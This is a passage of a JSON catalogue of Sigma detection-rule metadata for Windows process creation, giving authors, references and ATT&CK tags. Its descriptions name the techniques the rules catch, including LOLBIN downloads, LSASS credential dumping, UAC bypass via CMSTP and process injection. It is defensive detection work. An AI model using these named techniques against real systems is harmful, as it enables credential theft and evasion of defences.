"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f53714ec-5077-420e-ad20-907ff9bb2958", "value": "Forfiles.EXE Child Process Masquerading" }, { "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords.\nThis was seen being used in combination with \"icacls\" and other utilities to spot misconfigured files or folders permissions.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_recon_everyone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", "value": "Permission Misconfiguration Reconnaissance Via Findstr.EXE" }, { "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_devinit_lolbin_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1460815932402679809", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90d50722-0483-4065-8e35-57efaadd354d", "value": "Arbitrary MSI Download Via Devinit.EXE" }, { "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_stdin_redirect.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "241e802a-b65e-484f-88cd-c2dc10f9206d", "value": "Read Contents From Stdin Via Cmd.EXE" }, { "description": "Detects possible password spraying attempts using Dsacls", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate use of dsacls to bind to an LDAP session" ], "filename": "proc_creation_win_dsacls_password_spray.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/dsacls.html", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "value": "Potential Password Spraying Attempt Using Dsacls.EXE" }, { "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2022-06-14", "falsepositive": [ "Legitimate use by a via a batch script or by an administrator." ], "filename": "proc_creation_win_lolbin_pcalua.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "value": "Use of Pcalua For Execution" }, { "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f35c5d71-b489-4e22-a115-f003df287317", "value": "Potential CobaltStrike Process Patterns" }, { "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "Another tool that uses the command line switches of PsLogList", "Legitimate use of PsLogList by an administrator" ], "filename": "proc_creation_win_sysinternals_psloglist.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://twitter.com/EricaZelic/status/1614075109827874817", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml" ], "tags": [ "attack.discovery", "attack.t1087", "attack.t1087.001", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "value": "Suspicious Use of PsLogList" }, { "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84232095-ecca-4015-b0d7-7726507ee793", "value": "Suspicious DLL Loaded via CertOC.EXE" }, { "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "False positives might occur if the users are unaware of such control checks" ], "filename": "proc_creation_win_winget_add_insecure_custom_source.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "value": "Add Insecure Download Source To Winget" }, { "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_sftp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", "value": "Use Of The SFTP.EXE Binary As A LOLBIN" }, { "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022-12-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_renamed_mavinject.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://twitter.com/Hexacorn/status/776122138063409152", "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.001", "attack.t1218.013" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", "value": "Renamed Mavinject.EXE Execution" }, { "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\n", "meta": { "author": "Josh Nickels, Qi Nan", "creation_date": "2024-03-11", "falsepositive": [ "Legitimate usage of TeamViewer" ], "filename": "proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab70c354-d9ac-4e11-bbb6-ec8e3b153357", "value": "Remote Access Tool - Team Viewer Session Started On Windows Host" }, { "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-20", "falsepositive": [ "Command lines that use the same flags" ], "filename": "proc_creation_win_renamed_createdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://twitter.com/bopin2020/status/1366400799199272960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "value": "Renamed CreateDump Utility Execution" }, { "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", "meta": { "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "creation_date": "2021-11-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lsass_process_clone.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", "https://twitter.com/Hexacorn/status/1420053502554951689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "value": "Potential Credential Dumping Via LSASS Process Clone" }, { "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { "author": "Nik Seetharaman", "creation_date": "2018-07-16", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "proc_creation_win_cmstp_execution_by_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.003", "attack.g0069", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", "value": "CMSTP Execution Process Creation" }, { "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", "meta": { "author": "frack113", "creation_date": "2022-01-30", "falsepositive": [ "Scripts created by developers and admins", "Administrative activity" ], "filename": "proc_creation_win_takeown_recursive_own.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.001" ] }, "related": [ { "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", "value": "Suspicious Recursive Takeown" }, { "description": "Detects a potentially suspicious execution from an uncommon folder.", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_execution_path.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "value": "Process Execution From A Potentially Suspicious Folder" }, { "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-12-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_image_missing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlaboratories.com/2021/12/08/process-ghosting/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", "value": "Execution Of Non-Existing File" }, { "description": "Detects calls to base64 encoded WMI class such as \"Win32_ShadowCopy\", \"Win32_ScheduledJob\", etc.", "meta": { "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_wmi_classes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1816994b-42e1-4fb1-afd2-134d88184f71", "value": "PowerShell Base64 Encoded WMI Classes" }, { "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_nircmd.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", "value": "PUA - NirCmd Execution" }, { "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_nteventlogfile_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "caf201a9-c2ce-4a26-9c3a-2b9525413711", "value": "Potentially Suspicious Call To Win32_NTEventlogFile Class" }, { "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", "meta": { "author": "_pete_0, TheDFIRReport", "creation_date": "2022-05-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "value": "Operator Bloopers Cobalt Strike Modules" }, { "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wab_unusual_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "value": "Wab/Wabmig Unusual Parent Or Child Processes" }, { "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_wmp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "value": "UAC Bypass Using Windows Media Player - Process" }, { "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of cmstp.exe utility by legitimate user" ], "filename": "proc_creation_win_uac_bypass_cmstp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002", "attack.t1218.003" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", "value": "Bypass UAC via CMSTP" }, { "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_dllhost_no_cli_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://redcanary.com/blog/child-processes/", "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "value": "Dllhost.EXE Execution Anomaly" }, { "description": "Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-23", "falsepositive": [ "Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives" ], "filename": "proc_creation_win_schtasks_susp_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://twitter.com/RedDrip7/status/1506480588827467785", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "value": "Suspicious Command Patterns In Scheduled Task Creation" }, { "description": "Detects file execution using the msdeploy.exe lolbin", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "System administrator Usage" ], "filename": "proc_creation_win_lolbin_msdeploy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/999090532839313408", "https://twitter.com/pabraeken/status/995837734379032576", 